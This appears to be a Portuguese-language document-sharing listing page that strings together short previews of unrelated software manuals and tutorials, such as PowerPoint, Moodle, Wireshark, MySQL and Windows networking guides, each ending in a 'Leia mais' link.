Manual de instalação, configuração e utilização do Assinador Betha Manual de instalação, configuração e utilização do Assinador Betha Versão 1.2 Histórico de revisões Revisão Data Descrição da alteração 1.0 18/09/2015 Criação deste manual 1.1 22/09/2015 Executando a instalação

Leia mais

MANUAL DIPAM A Versão de 10/05/2012

MANUAL DIPAM A Versão de 10/05/2012 MANUAL DA DIPAM A Versão de 10/05/2012 1 Índice Geral... 3 Configuração Mínima... 3 Instalação... 4 Procedimento pós-instalação para sistemas com Vista ou Windows 7... 8 Uso do Programa DIPAM-A... 10 DIPAM

Leia mais

Projeto ECA na Escola - Plataforma de Educação à Distância

Projeto ECA na Escola - Plataforma de Educação à Distância Página1 Apresentação Projeto ECA na Escola - Plataforma de Educação à Distância Olá Participante do Projeto ECA na Escola, Este tutorial pretende auxiliá-lo na navegação na Plataforma de Educação à Distância

Leia mais

INSTRUÇÕES DE INSTALAÇÃO

INSTRUÇÕES DE INSTALAÇÃO INSTRUÇÕES DE INSTALAÇÃO RMCCI Versão 4.0 1 28/11/2005 Para instalar o RMCCI Versão 4.0 monousuário Você precisará ter o CD-ROM ou os arquivos de instalação originais desta versão. I - REQUISITOS DE SISTEMA

Leia mais

Para o PowerPoint, assim como para vários softwares de apresentação, uma apresentação é um conjunto de slides.

Para o PowerPoint, assim como para vários softwares de apresentação, uma apresentação é um conjunto de slides. POWERPOINT 1. O QUE É UMA APRESENTAÇÃO Para o PowerPoint, assim como para vários softwares de apresentação, uma apresentação é um conjunto de slides. Em cada slide podemos ter vários elementos ou objetos

Leia mais

Lync Acessando o Lync Web App

Lync Acessando o Lync Web App Lync Acessando o Lync Web App Saiba como ingressar em uma reunião, quais são os recursos disponíveis, as configurações e conheça o layout do Lync Web App. Sumário Lync Web App... 1 Ingressar em uma Reunião

Leia mais

No projeto das primeiras redes de computadores, o hardware foi a principal preocupação e o software ficou em segundo plano.

No projeto das primeiras redes de computadores, o hardware foi a principal preocupação e o software ficou em segundo plano. No projeto das primeiras redes de computadores, o hardware foi a principal preocupação e o software ficou em segundo plano. Essa estratégia foi deixada para trás. Atualmente, o software de rede é altamente

Leia mais

FEMA Fundação Educacional Machado de Assis INFORMÁTICA Técnico em Segurança do Trabalho P OW ERPOI NT. Escola Técnica Machado de Assis Imprensa

FEMA Fundação Educacional Machado de Assis INFORMÁTICA Técnico em Segurança do Trabalho P OW ERPOI NT. Escola Técnica Machado de Assis Imprensa P OW ERPOI NT 1 INTRODUÇÃO... 3 1. Iniciando o PowerPoint... 3 2. Assistente de AutoConteúdo... 4 3. Modelo... 5 4. Iniciar uma apresentação em branco... 6 5. Modo de Exibição... 6 6. Slide Mestre... 7

Leia mais

Experiência 05: CONFIGURAÇÃO BÁSICA DE UMA REDE. Objetivo Geral Criar uma rede ponto-a-ponto com crossover e utiizando switch.

Experiência 05: CONFIGURAÇÃO BÁSICA DE UMA REDE. Objetivo Geral Criar uma rede ponto-a-ponto com crossover e utiizando switch. ( ) Prova ( ) Prova Semestral ( ) Exercícios ( ) Prova Modular ( ) Segunda Chamada ( ) Exame Final ( ) Prática de Laboratório ( ) Aproveitamento Extraordinário de Estudos Nota: Disciplina: Turma: Aluno

Leia mais

Manual de Utilização do PDV Klavix

Manual de Utilização do PDV Klavix Manual de Utilização do PDV Klavix Página 1/20 Instalando a partir do CD Se você recebeu um CD de instalação, rode o programa Instalador que se encontra no raiz do seu CD. Ele vai criar a pasta c:\loureiro

Leia mais

Redes Ponto a Ponto. Os drivers das placas de rede devem estar instalados.

Redes Ponto a Ponto. Os drivers das placas de rede devem estar instalados. Redes Ponto a Ponto É fácil configurar uma rede ponto-a-ponto em qualquer versão do Windows. Antes entretanto é preciso tomar algumas providências em relação ao hardware: Todos os computadores devem estar

Leia mais

Composição de Layout no Spring

Composição de Layout no Spring UNIVERSIDADE FEDERAL DE MINAS GERAIS INSTITUTO DE GEOCIÊNCIAS DEPARTAMENTO DE CARTOGRAFIA Laboratório de Geoprocessamento Grazielle Anjos Carvalho Vladimir Diniz Vieira Ramos Belo Horizonte, 2007 CRIAÇÃO

Leia mais

Figura 1: tela inicial do BlueControl COMO COLOCAR A SALA DE INFORMÁTICA EM FUNCIONAMENTO?

Figura 1: tela inicial do BlueControl COMO COLOCAR A SALA DE INFORMÁTICA EM FUNCIONAMENTO? Índice BlueControl... 3 1 - Efetuando o logon no Windows... 4 2 - Efetuando o login no BlueControl... 5 3 - A grade de horários... 9 3.1 - Trabalhando com o calendário... 9 3.2 - Cancelando uma atividade

Leia mais

Insight Teacher Quickstart Guide

Insight Teacher Quickstart Guide 1 2 Site de Internet: www.faronics.com E-mail: sales@faronics.com Telefone: (+1) 800-943-6422 ou (+1) 604-637-3333 Fax: (+1) 800-943-6488 ou (+1) 604-637-8188 Horário: de segunda-feira a sexta-feira, das

Leia mais

MANUAL DE INSTALAÇÃO O melhor sistema de Gestão Financeira para micro e pequenas empresas.

MANUAL DE INSTALAÇÃO O melhor sistema de Gestão Financeira para micro e pequenas empresas. MANUAL DE INSTALAÇÃO O melhor sistema de Gestão Financeira para micro e pequenas empresas. INDÍCE 1. Características gerais 2. Guia rápido de instalação 3. Processo de instalação 4. Opções avançadas de

Leia mais

Wireshark Lab: Iniciando

Wireshark Lab: Iniciando Wireshark Lab: Iniciando Versão 1.1 2005 KUROSE, J.F & ROSS, K. W. Todos os direitos reservados 2008 BATISTA, O. M. N. Tradução e adaptação para Wireshark. Conte-me e esqueço. Mostre-me e eu lembro. Envolva-me

Leia mais

Configurações das notificações do sistema. Mike McBride Tradução: Lisiane Sztoltz

Configurações das notificações do sistema. Mike McBride Tradução: Lisiane Sztoltz Configurações das notificações do sistema Mike McBride Tradução: Lisiane Sztoltz 2 Conteúdo 1 Configurações das notificações do sistema 4 1.1 Aplicativos.......................................... 4 1.1.1

Leia mais

1. REGISTRO DE PROJETOS

1. REGISTRO DE PROJETOS 1. REGISTRO DE PROJETOS Nesta aplicação será feito o registro dos projetos/ ações de extensão, informando os dados iniciais do projeto, as classificações cabíveis, os participantes, a definição da região

Leia mais

Veja em Tela cheia abaixo: Página nº 2

Veja em Tela cheia abaixo: Página nº 2 Neste pequeno manual iremos conhecer as diversas impressoras que poderemos utilizar no sistema park service, a impressora poderá ser matricial ou térmica utilizando uma bobina de papel 40 colunas, facilmente

Leia mais

Padrão ix. Q-Ware Cloud File Publisher Manual para realização do Donwload de Arquivos. Versão 1.0.1.0

Padrão ix. Q-Ware Cloud File Publisher Manual para realização do Donwload de Arquivos. Versão 1.0.1.0 Padrão ix Q-Ware Cloud File Publisher Manual para realização do Donwload de Arquivos Versão 1.0.1.0 Copyright 2000-2013 Padrão ix Sistemas Abertos Ltda. Todos os direitos reservados. As informações contidas

Leia mais

OpenOffice Calc Aula 4

OpenOffice Calc Aula 4 OpenOffice Calc Aula 4 Objetivos: Apresentar a criação de um gráfico no CALC, a partir dos dados em uma planilha Apresentar os diversos tipos de gráficos e suas aplicações (gráfico de coluna, de linha,

Leia mais

Curso de Informática Básica

Curso de Informática Básica Curso de Informática Básica A Web Descomplique 1 Curso de Informática Básica Índice Introdução...3 Organizando os favoritos...3 Localizando Informações na página...5 Histórico de Navegação...7 Capturando

Leia mais

LINEAR-HCS RUA SÃO JORGE, 269 TELEFONE: (11) 2823-8800 SÃO CAETANO DO SUL SÃO PAULO CEP: 09530-250

LINEAR-HCS RUA SÃO JORGE, 269 TELEFONE: (11) 2823-8800 SÃO CAETANO DO SUL SÃO PAULO CEP: 09530-250 LINEAR-HCS RUA SÃO JORGE, 269 TELEFONE: (11) 2823-8800 SÃO CAETANO DO SUL SÃO PAULO CEP: 09530-250 1 SOFTWARE HCS 2005 - VERSÃO 4.5 (Compatível com Guarita Vr4.03 ou superior) Recomendações Iniciais Para

Leia mais

CÓPIA E EXPORTAÇÃO DE SALA

CÓPIA E EXPORTAÇÃO DE SALA CÓPIA E EXPORTAÇÃO DE SALA Você sabia? No Blackboard, é possível reutilizar os conteúdos de uma maneira prática, adaptando as estruturas e materiais existentes. Você pode copiar o conteúdo de uma disciplina

Leia mais

Manual Rápido de Registro e Configuração do DJPDV

Manual Rápido de Registro e Configuração do DJPDV Página 1 Manual Rápido de Registro e Configuração do DJPDV Juliana Rodrigues Prado Tamizou www.djsystem.com.br (15) 3324-3333 Rua Coronel Aureliano de Camargo,973 Centro - Tatuí SP - 18270-170 Revisado

Leia mais

FileMaker Pro 13. Utilização de uma Conexão de Área de Trabalho Remota com o FileMaker Pro 13

FileMaker Pro 13. Utilização de uma Conexão de Área de Trabalho Remota com o FileMaker Pro 13 FileMaker Pro 13 Utilização de uma Conexão de Área de Trabalho Remota com o FileMaker Pro 13 2007-2013 FileMaker Inc. Todos os direitos reservados. FileMaker Inc. 5201 Patrick Henry Drive Santa Clara,

Leia mais

Introdução ao icare 2

Introdução ao icare 2 Introdução ao icare 2 (Instrumentação para a Coleta Assistida de Resíduos Recicláveis V.2) Arthur Elídio da Silva Lucas Zenaro José Tarcísio F. de Camargo Unipinhal (2015) SUMÁRIO 1. INTRODUÇÃO... 3 O

Leia mais

UNIVERSIDADE FEDERAL DO AMAPÁ PRÓ REITORIA DE ADMINISTRAÇÃO E PLANEJAMENTO DEPARTAMENTO DE INFORMÁTICA. Manual do Moodle- Sala virtual

UNIVERSIDADE FEDERAL DO AMAPÁ PRÓ REITORIA DE ADMINISTRAÇÃO E PLANEJAMENTO DEPARTAMENTO DE INFORMÁTICA. Manual do Moodle- Sala virtual UNIVERSIDADE FEDERAL DO AMAPÁ PRÓ REITORIA DE ADMINISTRAÇÃO E PLANEJAMENTO DEPARTAMENTO DE INFORMÁTICA Manual do Moodle- Sala virtual UNIFAP MACAPÁ-AP 2012 S U M Á R I O 1 Tela de Login...3 2 Tela Meus

Leia mais

Configurando um Grupo Doméstico e Compartilhando arquivos no Windows 7

Configurando um Grupo Doméstico e Compartilhando arquivos no Windows 7 Configurando um Grupo Doméstico e Compartilhando arquivos no Windows 7 Para criar um grupo doméstico e compartilhar arquivos é necessário que tenhamos pelo menos dois computadores ligados entre si (em

Leia mais

MANUAL DE CONFIGURAÇÃO

MANUAL DE CONFIGURAÇÃO MANUAL DE CONFIGURAÇÃO Índice Conteúdo Página Legendas 3 1.0 Primeiro acesso 5 2.0 Cadastro de login e senha 6 3.0 Configuração do Blocker 7 3.1 Senha de acesso 8 3.2 Grade de Horário 9 3.2.1 Configurando

Leia mais

OFICINA DE POWER POINT

OFICINA DE POWER POINT OFICINA DE POWER POINT Barra de Ferramentas Padrão Barra de Ferramentas Formatação Barra de Menus Modos de Visualização Painéis de Tarefas Barra de Ferramentas Desenho Profª. Maria Adelina Raupp Sganzerla

Leia mais

Unidade 3: Personalizando o Excel *

Unidade 3: Personalizando o Excel * Unidade 3: Personalizando o Excel * material do 2010* 3.0 Introdução Visto que você está fazendo este curso, você provavelmente passa ou espera passar muito tempo trabalhando com o Excel. Assim, você precisa

Leia mais

Manual de Orientação para Acesso e Uso do SARA Versão ERA s

Manual de Orientação para Acesso e Uso do SARA Versão ERA s Manual de Orientação para Acesso e Uso do SARA Versão ERA s 1. Introdução O SARA foi elaborado visando facilitar o dia a dia do produtor, foi desenvolvido em Delphi, utilizando banco de dados Firebird,

Leia mais

VERSÃO: 1.3 TÍTULO: GUIA DE INÍCIO RÁPIDO CLIENTE: FUNCEF

VERSÃO: 1.3 TÍTULO: GUIA DE INÍCIO RÁPIDO CLIENTE: FUNCEF Objetivo: Esse guia tem por objetivo auxiliar a instalação e configuração dos dispositivos a serem utilizados para monitoramento com o Olho Digital. Os acessos poderão ser feitos de 3 maneiras: 1- Por

Leia mais

Seja muito bem-vinda(o) ao Curso de Gestão em Projetos Sociais - PMD Pro1!

Seja muito bem-vinda(o) ao Curso de Gestão em Projetos Sociais - PMD Pro1! Olá participante, Seja muito bem-vinda(o) ao Curso de Gestão em Projetos Sociais - PMD Pro1 Este documento é longo e importante. Por isso, pedimos, por gentileza, que você leiao até o final e siga atentamente

Leia mais

Terminal de Consulta de Preço. Linha Vader. Modelo TT300 e TT1000i

Terminal de Consulta de Preço. Linha Vader. Modelo TT300 e TT1000i Terminal de Consulta de Preço Linha Vader Modelo TT300 e TT1000i Índice 1. Conhecendo o Terminal de Consulta 03 1.1 Configurando o endereço IP no terminal 04 2. Conhecendo o Software TTSocket 06 3. Instalando

Leia mais

LABORATÓRIO UNIDADES 1 REVISÃO LINUX E COMANDOS BÁSICOS ABRINDO A MÁQUINA VIRTUAL UBUNTU SERVER 14.04.1 PELO VIRTUALBOX

LABORATÓRIO UNIDADES 1 REVISÃO LINUX E COMANDOS BÁSICOS ABRINDO A MÁQUINA VIRTUAL UBUNTU SERVER 14.04.1 PELO VIRTUALBOX LABORATÓRIO UNIDADES 1 REVISÃO LINUX E COMANDOS BÁSICOS ABRINDO A MÁQUINA VIRTUAL UBUNTU SERVER 14.04.1 PELO VIRTUALBOX Procure no MENU INICIAR PROGRAMAS o ícone do VirtualBox e execute-o. Em seguida clique

Leia mais

Professor: Macêdo Firmino Disciplina: Sistemas Operacionais de Rede

Professor: Macêdo Firmino Disciplina: Sistemas Operacionais de Rede Professor: Macêdo Firmino Disciplina: Sistemas Operacionais de Rede O servidor de arquivos fornece um ponto centralizado na rede para armazenamento e compartilhamento de arquivos entre os usuários. Quando

Leia mais

Configurando o Controle dos Pais no Windows Vista

Configurando o Controle dos Pais no Windows Vista Autor: Bruno Leonardo MCP, MCDST, MCSA http://brunoleonardoleal.spaces.live.com 24/06/2007 Configurando o Controle dos Pais no Windows Vista Página 1 de 16 O Controle dos Pais está disponível nas versões

Leia mais

Manual de Utilizador. Caderno. Recursos da Unidade Curricular. Gabinete de Ensino à Distância do IPP. http://eweb.ipportalegre.pt. ged@ipportalegre.

Manual de Utilizador. Caderno. Recursos da Unidade Curricular. Gabinete de Ensino à Distância do IPP. http://eweb.ipportalegre.pt. ged@ipportalegre. Manual de Utilizador Caderno Recursos da Unidade Curricular Gabinete de Ensino à Distância do IPP http://eweb.ipportalegre.pt ged@ipportalegre.pt Índice RECURSOS... 1 ADICIONAR E CONFIGURAR RECURSOS...

Leia mais

Simulador PMP - 4º Edição Exame de Certificação do PMI

Simulador PMP - 4º Edição Exame de Certificação do PMI Simulador PMP - 4º Edição Exame de Certificação do PMI WWW.ASASSOFTWARES.COM.BR Índice 1 Informações Básicas... 1 1.1 Sair da aplicação... 1 1.2 Testar aplicação... 1 1.3 Licenciando a aplicação... 1 1.4

Leia mais

MÓDULO DE MATRICULA UNASUS

MÓDULO DE MATRICULA UNASUS MÓDULO DE MATRICULA UNASUS Guia de Instalação e Configuração (Moodle 2.x) Resumo Este documento lista o fluxo para aquisição do modulo de matricula, geração de chaves para acesso ao webservice do Arouca

Leia mais

Para o OpenOffice Impress, assim como para vários softwares de apresentação, uma apresentação é um conjunto de slides.

Para o OpenOffice Impress, assim como para vários softwares de apresentação, uma apresentação é um conjunto de slides. OPENOFFICE IMPRESS 1. O QUE É UMA APRESENTAÇÃO Para o OpenOffice Impress, assim como para vários softwares de apresentação, uma apresentação é um conjunto de slides. Em cada slide podemos ter vários elementos

Leia mais

Manual do Software Pctel Supervisor Desktop

Manual do Software Pctel Supervisor Desktop Manual do Software Pctel Supervisor Desktop Conteúdo O que é o Pctel Supervisor Desktop?...03 O que é usuário do canal (PA)?...03 Como cadastrar usuário do canal (PA)?...04 Como remover um usuário do canal?...05

Leia mais

Guia do Usuário. idocs Content Server v.2.0-1 -

Guia do Usuário. idocs Content Server v.2.0-1 - Guia do Usuário idocs Content Server v.2.0-1 - 2013 BBPaper_Ds - 2 - Sumário Introdução... 4 Inicializando a aplicação... 6 Ambiente... 7 Alterando o ambiente... 8 Senhas... 10 Alterando senhas... 10 Elementos

Leia mais

CADERNOS DE INFORMÁTICA Nº 1. Fundamentos de Informática I - Word 2010. Sumário

CADERNOS DE INFORMÁTICA Nº 1. Fundamentos de Informática I - Word 2010. Sumário CADERNO DE INFORMÁTICA FACITA Faculdade de Itápolis Aplicativos Editores de Texto WORD 2007/2010 Sumário Editor de texto... 3 Iniciando Microsoft Word... 4 Fichários:... 4 Atalhos... 5 Área de Trabalho:

Leia mais

Usando o do-file editor Automatizando o Stata

Usando o do-file editor Automatizando o Stata Usando o do-file editor Automatizando o Stata 1 O QUE É O EDITOR DE DO-FILE O Stata vem com um editor de texto integrado, o do-file editor (editor de do-files, em português), que pode ser usado para executar

Leia mais

Guia de Usuário do Servidor do Avigilon Control Center. Versão 5.6

Guia de Usuário do Servidor do Avigilon Control Center. Versão 5.6 Guia de Usuário do Servidor do Avigilon Control Center Versão 5.6 2006-2015 Avigilon Corporation. Todos os direitos reservados. A menos que seja expressamente concedida por escrito, nenhuma licença será

Leia mais

Neste tópico, abordaremos a funcionalidade de segurança fornecida com o SAP Business One.

Neste tópico, abordaremos a funcionalidade de segurança fornecida com o SAP Business One. Neste tópico, abordaremos a funcionalidade de segurança fornecida com o SAP Business One. 1 Ao final deste tópico, você estará apto a: Descrever as funções de segurança fornecidas pelo System Landscape

Leia mais

Neste tópico, veremos como selecionar e copiar informações entre bancos de dados de empresa no SAP Business One.

Neste tópico, veremos como selecionar e copiar informações entre bancos de dados de empresa no SAP Business One. Neste tópico, veremos como selecionar e copiar informações entre bancos de dados de empresa no SAP Business One. 1 Neste tópico, você aprenderá a usar a ferramenta Quick Copy durante um projeto de implementação.

Leia mais

Guia do Usuário do Aplicativo Desktop Client

Guia do Usuário do Aplicativo Desktop Client Guia do Usuário do Aplicativo Desktop Client Versão 6 20/08/2010 OAISYS 7965 S. Priest Drive, Suite 105 Tempe, AZ 85284 (480) 496-9040 Guia do Usuário do Aplicativo OAISYS Desktop Client 1 Instalação Navegue

Leia mais

Manual Banco de dados MySQL

Manual Banco de dados MySQL Manual Banco de dados MySQL Introdução Serão apresentadas neste manual, as operações envolvendo uma conversão com banco de dados MySQL. Incluindo a devida forma de criar e restaurar um backup, de ter acesso

Leia mais

Manual do Teclado de Satisfação Online WebOpinião

Manual do Teclado de Satisfação Online WebOpinião Manual do Teclado de Satisfação Online WebOpinião Versão 1.2.3 27 de novembro de 2015 Departamento de Engenharia de Produto (DENP) SEAT Sistemas Eletrônicos de Atendimento 1. Introdução O Teclado de Satisfação

Leia mais

Manual de Utilização

Manual de Utilização Manual de Utilização Versão 3.10 Sumário 1 Funções do Emissor... 3 1.1 Aba Inicial... 4 1.2 Aba Sistema... 5 1.2.1 Mensagem Sistema... 5 1.2.2 Extras... 6 1.2.3 Contingência... 6 1.2.4 Execução... 7 1.3

Leia mais

GESTÃO DE INFORMAÇÃO PESSOAL OUTLOOK (1)

GESTÃO DE INFORMAÇÃO PESSOAL OUTLOOK (1) GESTÃO DE INFORMAÇÃO PESSOAL OUTLOOK (1) MICROSOFT OUTLOOK 2003 - OBJECTIVOS OBJECTIVOS: Enumerar as principais funcionalidades do Outlook; Demonstrar a utilização das ferramentas do correio electrónico;

Leia mais

Gravando Dados e Cópias de CD s com o Nero 6.0 Disciplina Operação de Sistemas Aplicativos I

Gravando Dados e Cópias de CD s com o Nero 6.0 Disciplina Operação de Sistemas Aplicativos I CENTRO ESTADUAL DE EDUCAÇÃO TECNOLÓGICA PAULA SOUZA Escola Técnica Estadual de Avaré ETE-AVARÉ CURSO DE TÉCNICO EM INFORMÁTICA NÚCLEO DE APOIO Gravando Dados e Cópias de CD s com o Nero 6.0 Disciplina

Leia mais

ROTEIRO PARA EMISSÃO DE CERTIFICADO DIGITAL A1

ROTEIRO PARA EMISSÃO DE CERTIFICADO DIGITAL A1 ROTEIRO PARA EMISSÃO DE CERTIFICADO DIGITAL A1 Informações importantes sobre a emissão do Certificado A1: 1. Todos os certificados do tipo A1 emitidos no computador/usuário são gerados em um único Repositório

Leia mais

NOTA: A calibração instrumentada não é compatível com a KODAK Photo Printer 6800/6850 e a KODAK Photo Printer 605.

NOTA: A calibração instrumentada não é compatível com a KODAK Photo Printer 6800/6850 e a KODAK Photo Printer 605. Arquivo LeiaMe para o Aplicativo de calibração da KODAK Photo Printer Novembro de 2011 Introdução Bem-vindo ao Aplicativo de calibração da KODAK Photo Printer para WINDOWS, uma ferramenta para calibrar

Leia mais